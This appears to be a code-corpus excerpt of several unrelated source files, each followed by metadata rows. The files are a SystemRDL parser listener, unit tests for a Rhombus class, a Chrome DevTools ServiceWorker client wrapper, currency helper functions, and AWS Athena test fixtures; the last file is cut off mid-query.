def enterRdl_out_parm_assign(self, ctx:SystemRDLParser.Rdl_out_parm_assignContext):
if enable_debug:
print("enterRdl_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#rdl_out_parm_assign.
def exitRdl_out_parm_assign(self, ctx:SystemRDLParser.Rdl_out_parm_assignContext):
if enable_debug:
print("exitRdl_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#jspec_out_defs.
def enterJspec_out_defs(self, ctx:SystemRDLParser.Jspec_out_defsContext):
if enable_debug:
print("enterJspec_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#jspec_out_defs.
def exitJspec_out_defs(self, ctx:SystemRDLParser.Jspec_out_defsContext):
if enable_debug:
print("exitJspec_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#jspec_out_parm_assign.
def enterJspec_out_parm_assign(self, ctx:SystemRDLParser.Jspec_out_parm_assignContext):
if enable_debug:
print("enterJspec_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#jspec_out_parm_assign.
def exitJspec_out_parm_assign(self, ctx:SystemRDLParser.Jspec_out_parm_assignContext):
if enable_debug:
print("exitJspec_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#systemverilog_out_defs.
def enterSystemverilog_out_defs(self, ctx:SystemRDLParser.Systemverilog_out_defsContext):
if enable_debug:
print("enterSystemverilog_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#systemverilog_out_defs.
def exitSystemverilog_out_defs(self, ctx:SystemRDLParser.Systemverilog_out_defsContext):
if enable_debug:
print("exitSystemverilog_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#systemverilog_out_parm_assign.
def enterSystemverilog_out_parm_assign(self, ctx:SystemRDLParser.Systemverilog_out_parm_assignContext):
if enable_debug:
print("enterSystemverilog_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#systemverilog_out_parm_assign.
def exitSystemverilog_out_parm_assign(self, ctx:SystemRDLParser.Systemverilog_out_parm_assignContext):
if enable_debug:
print("exitSystemverilog_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#systemverilog_wrapper_info.
def enterSystemverilog_wrapper_info(self, ctx:SystemRDLParser.Systemverilog_wrapper_infoContext):
if enable_debug:
print("enterSystemverilog_wrapper_info")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#systemverilog_wrapper_info.
def exitSystemverilog_wrapper_info(self, ctx:SystemRDLParser.Systemverilog_wrapper_infoContext):
if enable_debug:
print("exitSystemverilog_wrapper_info")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#systemverilog_wrapper_remap_command.
def enterSystemverilog_wrapper_remap_command(self, ctx:SystemRDLParser.Systemverilog_wrapper_remap_commandContext):
if enable_debug:
print("enterSystemverilog_wrapper_remap_command")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#systemverilog_wrapper_remap_command.
def exitSystemverilog_wrapper_remap_command(self, ctx:SystemRDLParser.Systemverilog_wrapper_remap_commandContext):
if enable_debug:
print("exitSystemverilog_wrapper_remap_command")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#uvmregs_out_defs.
def enterUvmregs_out_defs(self, ctx:SystemRDLParser.Uvmregs_out_defsContext):
if enable_debug:
print("enterUvmregs_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#uvmregs_out_defs.
def exitUvmregs_out_defs(self, ctx:SystemRDLParser.Uvmregs_out_defsContext):
if enable_debug:
print("exitUvmregs_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#uvmregs_out_parm_assign.
def enterUvmregs_out_parm_assign(self, ctx:SystemRDLParser.Uvmregs_out_parm_assignContext):
if enable_debug:
print("enterUvmregs_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#uvmregs_out_parm_assign.
def exitUvmregs_out_parm_assign(self, ctx:SystemRDLParser.Uvmregs_out_parm_assignContext):
if enable_debug:
print("exitUvmregs_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#reglist_out_defs.
def enterReglist_out_defs(self, ctx:SystemRDLParser.Reglist_out_defsContext):
if enable_debug:
print("enterReglist_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#reglist_out_defs.
def exitReglist_out_defs(self, ctx:SystemRDLParser.Reglist_out_defsContext):
if enable_debug:
print("exitReglist_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#reglist_out_parm_assign.
def enterReglist_out_parm_assign(self, ctx:SystemRDLParser.Reglist_out_parm_assignContext):
if enable_debug:
print("enterReglist_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#reglist_out_parm_assign.
def exitReglist_out_parm_assign(self, ctx:SystemRDLParser.Reglist_out_parm_assignContext):
if enable_debug:
print("exitReglist_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#bench_out_defs.
def enterBench_out_defs(self, ctx:SystemRDLParser.Bench_out_defsContext):
if enable_debug:
print("enterBench_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#bench_out_defs.
def exitBench_out_defs(self, ctx:SystemRDLParser.Bench_out_defsContext):
if enable_debug:
print("exitBench_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#bench_out_parm_assign.
def enterBench_out_parm_assign(self, ctx:SystemRDLParser.Bench_out_parm_assignContext):
if enable_debug:
print("enterBench_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#bench_out_parm_assign.
def exitBench_out_parm_assign(self, ctx:SystemRDLParser.Bench_out_parm_assignContext):
if enable_debug:
print("exitBench_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#xml_out_defs.
def enterXml_out_defs(self, ctx:SystemRDLParser.Xml_out_defsContext):
if enable_debug:
print("enterXml_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#xml_out_defs.
def exitXml_out_defs(self, ctx:SystemRDLParser.Xml_out_defsContext):
if enable_debug:
print("exitXml_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#xml_out_parm_assign.
def enterXml_out_parm_assign(self, ctx:SystemRDLParser.Xml_out_parm_assignContext):
if enable_debug:
print("enterXml_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#xml_out_parm_assign.
def exitXml_out_parm_assign(self, ctx:SystemRDLParser.Xml_out_parm_assignContext):
if enable_debug:
print("exitXml_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#model_annotation.
def enterModel_annotation(self, ctx:SystemRDLParser.Model_annotationContext):
if enable_debug:
print("enterModel_annotation")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#model_annotation.
def exitModel_annotation(self, ctx:SystemRDLParser.Model_annotationContext):
if enable_debug:
print("exitModel_annotation")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#annotation_command.
def enterAnnotation_command(self, ctx:SystemRDLParser.Annotation_commandContext):
if enable_debug:
print("enterAnnotation_command")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#annotation_command.
def exitAnnotation_command(self, ctx:SystemRDLParser.Annotation_commandContext):
if enable_debug:
print("exitAnnotation_command")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#implemented_rdl_property.
def enterImplemented_rdl_property(self, ctx:SystemRDLParser.Implemented_rdl_propertyContext):
if enable_debug:
print("enterImplemented_rdl_property")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#implemented_rdl_property.
def exitImplemented_rdl_property(self, ctx:SystemRDLParser.Implemented_rdl_propertyContext):
if enable_debug:
print("exitImplemented_rdl_property")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#bool.
def enterBool(self, ctx:SystemRDLParser.BoolContext):
if enable_debug:
print("enterBool")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#bool.
def exitBool(self, ctx:SystemRDLParser.BoolContext):
if enable_debug:
print("exitBool")
print(" |" + ctx.getText() + "|\n")
pass
| 38.142981 | 119 | 0.657973 | 4,755 | 44,017 | 5.834911 | 0.044585 | 0.06066 | 0.055145 | 0.099261 | 0.917679 | 0.897639 | 0.865525 | 0.850424 | 0.813696 | 0.796396 | 0 | 0.000391 | 0.244815 | 44,017 | 1,153 | 120 | 38.176062 | 0.834271 | 0.227003 | 0 | 0.594524 | 1 | 0 | 0.120625 | 0.070323 | 0 | 0 | 0 | 0 | 0 | 1 | 0.198175 | false | 0.198175 | 0.003911 | 0 | 0.20339 | 0.396349 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
111b9d09b72220de7a27bc2c92354daf7459eaaa | 4,565 | py | Python | shapes/rhombus_test.py | daniilzelekson/programming-2021-19fpl | 79e35be77ccb911b0d928f186be8bf0066229718 | [
"MIT"
] | null | null | null | shapes/rhombus_test.py | daniilzelekson/programming-2021-19fpl | 79e35be77ccb911b0d928f186be8bf0066229718 | [
"MIT"
] | null | null | null | shapes/rhombus_test.py | daniilzelekson/programming-2021-19fpl | 79e35be77ccb911b0d928f186be8bf0066229718 | [
"MIT"
] | null | null | null | """
Programming for linguists
Tests for Rhombus class.
"""
import unittest
from shapes.rhombus import Rhombus
class RhombusTestCase(unittest.TestCase):
"""
This Case of tests checks the functionality of the implementation of Rhombus
"""
def test_id(self):
"""
Creates a Rhombus.
Tests that the correct uid is returned.
"""
rhombus = Rhombus(228, 10, 10)
self.assertEqual(rhombus.get_uid(), 228)
def test_square_area(self):
"""
Creates a Rhombus with equal diagonals(Square).
Tests that the area is calculated correctly.
"""
rhombus = Rhombus(0, 5, 5)
self.assertEqual(rhombus.get_area(), 12.5)
def test_area(self):
"""
Creates a Rhombus.
Tests that the area is calculated correctly.
"""
rhombus = Rhombus(0, 5, 3)
self.assertEqual(rhombus.get_area(), 7.5)
def test_perimeter(self):
"""
Creates a Rhombus.
Tests that the perimeter is calculated correctly.
"""
rhombus = Rhombus(0, 6, 8)
self.assertEqual(rhombus.get_perimeter(), 20)
def test_height(self):
"""
Creates a Rhombus.
Tests that the height is calculated correctly.
"""
rhombus = Rhombus(0, 6, 8)
self.assertEqual(rhombus.get_height(), 4.8)
def test_square_perimeter(self):
"""
Creates a Rhombus with equal diagonals(Square).
Tests that the perimeter is calculated correctly.
"""
rhombus = Rhombus(0, 10, 10)
self.assertLess(abs(rhombus.get_perimeter() - 28.28), 0.1)
def test_uid_bad_input(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(TypeError):
rhombus = Rhombus('j', 8, 8)
print(rhombus.get_height())
def test_diagonal1_bad_input(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(TypeError):
rhombus = Rhombus(1, 'gg', 8)
print(rhombus.get_height())
def test_diagonal2_bad_input(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(TypeError):
rhombus = Rhombus(4, 8, 'gg')
print(rhombus.get_height())
def test_all_bad_input(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(TypeError):
rhombus = Rhombus('r', 'i', 'p')
print(rhombus.get_height())
def test_uid_bad_value(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(ValueError):
rhombus = Rhombus(-1, 8, 8)
print(rhombus.get_height())
def test_diagonal1_bad_value(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(ValueError):
rhombus = Rhombus(1, -1, 8)
print(rhombus.get_height())
def test_diagonal2_bad_value(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(ValueError):
rhombus = Rhombus(4, 8, -1)
print(rhombus.get_height())
def test_all_bad_value(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(ValueError):
rhombus = Rhombus(-1, -1, -1)
print(rhombus.get_height())
def test_diagonals_bad_value_boolean(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(TypeError):
rhombus = Rhombus(1, True, True)
print(rhombus.get_height())
def test_uid_bad_value_boolean(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(TypeError):
rhombus = Rhombus(True, 1, 1)
print(rhombus.get_height())
| 29.642857 | 84 | 0.58598 | 529 | 4,565 | 4.950851 | 0.149338 | 0.042764 | 0.07331 | 0.116075 | 0.830851 | 0.798778 | 0.789996 | 0.740359 | 0.716686 | 0.663994 | 0 | 0.021536 | 0.31851 | 4,565 | 153 | 85 | 29.836601 | 0.820315 | 0.312596 | 0 | 0.360656 | 0 | 0 | 0.003059 | 0 | 0 | 0 | 0 | 0 | 0.262295 | 1 | 0.262295 | false | 0 | 0.032787 | 0 | 0.311475 | 0.163934 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
115f48eb452c0f36b1aa09079d7e4368b5ed5208 | 8,410 | py | Python | cripy/protocol/serviceworker.py | Phill240/chrome-remote-interface-py | 285172f369c2210d986545aa99450a672ed847e6 | [
"Apache-2.0"
] | 5 | 2018-11-10T01:02:23.000Z | 2020-08-13T19:02:08.000Z | cripy/protocol/serviceworker.py | Phill240/chrome-remote-interface-py | 285172f369c2210d986545aa99450a672ed847e6 | [
"Apache-2.0"
] | 2 | 2018-11-10T01:01:42.000Z | 2018-11-10T01:02:53.000Z | cripy/protocol/serviceworker.py | Phill240/chrome-remote-interface-py | 285172f369c2210d986545aa99450a672ed847e6 | [
"Apache-2.0"
] | 3 | 2019-11-01T21:17:51.000Z | 2021-07-16T02:58:53.000Z | """This is an auto-generated file. Modify at your own risk"""
from typing import Awaitable, Any, Callable, Dict, List, Optional, Union, TYPE_CHECKING
if TYPE_CHECKING:
from cripy import ConnectionType, SessionType
__all__ = ["ServiceWorker"]
class ServiceWorker:
"""
Status: Experimental
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker`
"""
__slots__ = ["client"]
def __init__(self, client: Union["ConnectionType", "SessionType"]) -> None:
"""Initialize a new instance of ServiceWorker
:param client: The client instance to be used to communicate with the remote browser instance
"""
self.client: Union["ConnectionType", "SessionType"] = client
def deliverPushMessage(
self, origin: str, registrationId: str, data: str
) -> Awaitable[Dict]:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-deliverPushMessage`
:param origin: The origin
:param registrationId: The registrationId
:param data: The data
:return: The results of the command
"""
return self.client.send(
"ServiceWorker.deliverPushMessage",
{"origin": origin, "registrationId": registrationId, "data": data},
)
def disable(self) -> Awaitable[Dict]:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-disable`
:return: The results of the command
"""
return self.client.send("ServiceWorker.disable", {})
def dispatchSyncEvent(
self, origin: str, registrationId: str, tag: str, lastChance: bool
) -> Awaitable[Dict]:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-dispatchSyncEvent`
:param origin: The origin
:param registrationId: The registrationId
:param tag: The tag
:param lastChance: The lastChance
:return: The results of the command
"""
return self.client.send(
"ServiceWorker.dispatchSyncEvent",
{
"origin": origin,
"registrationId": registrationId,
"tag": tag,
"lastChance": lastChance,
},
)
def enable(self) -> Awaitable[Dict]:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-enable`
:return: The results of the command
"""
return self.client.send("ServiceWorker.enable", {})
def inspectWorker(self, versionId: str) -> Awaitable[Dict]:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-inspectWorker`
:param versionId: The versionId
:return: The results of the command
"""
return self.client.send("ServiceWorker.inspectWorker", {"versionId": versionId})
def setForceUpdateOnPageLoad(self, forceUpdateOnPageLoad: bool) -> Awaitable[Dict]:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-setForceUpdateOnPageLoad`
:param forceUpdateOnPageLoad: The forceUpdateOnPageLoad
:return: The results of the command
"""
return self.client.send(
"ServiceWorker.setForceUpdateOnPageLoad",
{"forceUpdateOnPageLoad": forceUpdateOnPageLoad},
)
def skipWaiting(self, scopeURL: str) -> Awaitable[Dict]:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-skipWaiting`
:param scopeURL: The scopeURL
:return: The results of the command
"""
return self.client.send("ServiceWorker.skipWaiting", {"scopeURL": scopeURL})
def startWorker(self, scopeURL: str) -> Awaitable[Dict]:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-startWorker`
:param scopeURL: The scopeURL
:return: The results of the command
"""
return self.client.send("ServiceWorker.startWorker", {"scopeURL": scopeURL})
def stopAllWorkers(self) -> Awaitable[Dict]:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-stopAllWorkers`
:return: The results of the command
"""
return self.client.send("ServiceWorker.stopAllWorkers", {})
def stopWorker(self, versionId: str) -> Awaitable[Dict]:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-stopWorker`
:param versionId: The versionId
:return: The results of the command
"""
return self.client.send("ServiceWorker.stopWorker", {"versionId": versionId})
def unregister(self, scopeURL: str) -> Awaitable[Dict]:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-unregister`
:param scopeURL: The scopeURL
:return: The results of the command
"""
return self.client.send("ServiceWorker.unregister", {"scopeURL": scopeURL})
def updateRegistration(self, scopeURL: str) -> Awaitable[Dict]:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-updateRegistration`
:param scopeURL: The scopeURL
:return: The results of the command
"""
return self.client.send(
"ServiceWorker.updateRegistration", {"scopeURL": scopeURL}
)
def workerErrorReported(
self, listener: Optional[Callable[[Dict[str, Any]], Any]] = None
) -> Any:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#event-workerErrorReported`
:param listener: Optional listener function
:return: If a listener was supplied the return value is a callable that
will remove the supplied listener otherwise a future that resolves
with the value of the event
"""
event_name = "ServiceWorker.workerErrorReported"
if listener is None:
future = self.client.loop.create_future()
def _listener(event: Optional[Dict] = None) -> None:
future.set_result(event)
self.client.once(event_name, _listener)
return future
self.client.on(event_name, listener)
return lambda: self.client.remove_listener(event_name, listener)
def workerRegistrationUpdated(
self, listener: Optional[Callable[[Dict[str, Any]], Any]] = None
) -> Any:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#event-workerRegistrationUpdated`
:param listener: Optional listener function
:return: If a listener was supplied the return value is a callable that
will remove the supplied listener otherwise a future that resolves
with the value of the event
"""
event_name = "ServiceWorker.workerRegistrationUpdated"
if listener is None:
future = self.client.loop.create_future()
def _listener(event: Optional[Dict] = None) -> None:
future.set_result(event)
self.client.once(event_name, _listener)
return future
self.client.on(event_name, listener)
return lambda: self.client.remove_listener(event_name, listener)
def workerVersionUpdated(
self, listener: Optional[Callable[[Dict[str, Any]], Any]] = None
) -> Any:
"""
See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#event-workerVersionUpdated`
:param listener: Optional listener function
:return: If a listener was supplied the return value is a callable that
will remove the supplied listener otherwise a future that resolves
with the value of the event
"""
event_name = "ServiceWorker.workerVersionUpdated"
if listener is None:
future = self.client.loop.create_future()
def _listener(event: Optional[Dict] = None) -> None:
future.set_result(event)
self.client.once(event_name, _listener)
return future
self.client.on(event_name, listener)
return lambda: self.client.remove_listener(event_name, listener)
| 36.565217 | 114 | 0.644828 | 846 | 8,410 | 6.361702 | 0.130024 | 0.048309 | 0.065403 | 0.08324 | 0.727239 | 0.701226 | 0.701226 | 0.701226 | 0.701226 | 0.667038 | 0 | 0 | 0.250416 | 8,410 | 229 | 115 | 36.724891 | 0.853744 | 0.390963 | 0 | 0.409091 | 1 | 0 | 0.142469 | 0.098146 | 0 | 0 | 0 | 0 | 0 | 1 | 0.215909 | false | 0 | 0.022727 | 0 | 0.465909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fec80b0e1ec32be8d4cf0bad84f2acae6af1d916 | 637 | py | Python | ex109/moeda.py | wtomalves/exerciciopython | 5c239521830cb8d092c7ff8646ff1f38c605509d | [
"MIT"
] | 1 | 2020-09-04T22:36:21.000Z | 2020-09-04T22:36:21.000Z | ex109/moeda.py | wtomalves/exerciciopython | 5c239521830cb8d092c7ff8646ff1f38c605509d | [
"MIT"
] | null | null | null | ex109/moeda.py | wtomalves/exerciciopython | 5c239521830cb8d092c7ff8646ff1f38c605509d | [
"MIT"
] | null | null | null |
def metade(p=0, show=False):
resp = p / 2
if show == True:
return moeda(resp)
else:
return resp
def dobro(p=0, show=False):
resp = p * 2
if show == True:
return moeda(resp)
else:
return resp
def aumentar(p=0 , desc=0, show=False):
resp = p + (p * desc/ 100)
if show == True:
return moeda(resp)
else:
return resp
def diminuir (p=0, desc=0, show=False):
resp = p - (p * desc / 100)
if show == True:
return moeda(resp)
else:
return resp
def moeda(p=0, moeda='R$'):
return f'{moeda}{p:.2f}'.replace('.',',')
| 14.477273 | 45 | 0.510204 | 92 | 637 | 3.532609 | 0.23913 | 0.030769 | 0.123077 | 0.172308 | 0.8 | 0.8 | 0.8 | 0.8 | 0.8 | 0.8 | 0 | 0.038095 | 0.340659 | 637 | 43 | 46 | 14.813953 | 0.735714 | 0 | 0 | 0.615385 | 0 | 0 | 0.028571 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0 | 0.038462 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
fefe76c8111d18fb0caeacfab65ef88b9d71e9de | 12,986 | py | Python | testing/test_awswrangler/test_athena.py | koshy1123/aws-data-wrangler | e7c8a2c99e1ca3eb26e434e3c6e8f6910e898200 | [
"Apache-2.0"
] | null | null | null | testing/test_awswrangler/test_athena.py | koshy1123/aws-data-wrangler | e7c8a2c99e1ca3eb26e434e3c6e8f6910e898200 | [
"Apache-2.0"
] | null | null | null | testing/test_awswrangler/test_athena.py | koshy1123/aws-data-wrangler | e7c8a2c99e1ca3eb26e434e3c6e8f6910e898200 | [
"Apache-2.0"
] | null | null | null | import logging
from pprint import pprint
import pytest
import boto3
from awswrangler import Session
from awswrangler.exceptions import QueryCancelled, QueryFailed
logging.basicConfig(level=logging.INFO, format="[%(asctime)s][%(levelname)s][%(name)s][%(funcName)s] %(message)s")
logging.getLogger("awswrangler").setLevel(logging.DEBUG)
@pytest.fixture(scope="module")
def cloudformation_outputs():
response = boto3.client("cloudformation").describe_stacks(StackName="aws-data-wrangler-test-arena")
outputs = {}
for output in response.get("Stacks")[0].get("Outputs"):
outputs[output.get("OutputKey")] = output.get("OutputValue")
yield outputs
@pytest.fixture(scope="module")
def session():
yield Session()
@pytest.fixture(scope="module")
def database(cloudformation_outputs):
if "GlueDatabaseName" in cloudformation_outputs:
database = cloudformation_outputs["GlueDatabaseName"]
else:
raise Exception("You must deploy the test infrastructure using Cloudformation!")
yield database
@pytest.fixture(scope="module")
def bucket(session, cloudformation_outputs):
if "BucketName" in cloudformation_outputs:
bucket = cloudformation_outputs["BucketName"]
session.s3.delete_objects(path=f"s3://{bucket}/")
else:
raise Exception("You must deploy the test infrastructure using Cloudformation!")
yield bucket
session.s3.delete_objects(path=f"s3://{bucket}/")
@pytest.fixture(scope="module")
def workgroup_secondary(bucket):
wkg_name = "awswrangler_test"
client = boto3.client('athena')
wkgs = client.list_work_groups()
wkgs = [x["Name"] for x in wkgs["WorkGroups"]]
if wkg_name not in wkgs:
response = client.create_work_group(Name=wkg_name,
Configuration={
"ResultConfiguration": {
"OutputLocation": f"s3://{bucket}/athena_workgroup_secondary/",
"EncryptionConfiguration": {
"EncryptionOption": "SSE_S3",
}
},
"EnforceWorkGroupConfiguration": True,
"PublishCloudWatchMetricsEnabled": True,
"BytesScannedCutoffPerQuery": 100_000_000,
"RequesterPaysEnabled": False
},
Description="AWS Data Wrangler Test WorkGroup")
pprint(response)
yield wkg_name
def test_workgroup_secondary(session, database, workgroup_secondary):
session.athena.run_query(query="SELECT 1", database=database, workgroup=workgroup_secondary)
def test_query_cancelled(session, database):
client_athena = boto3.client("athena")
query_execution_id = session.athena.run_query(query="""
SELECT
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
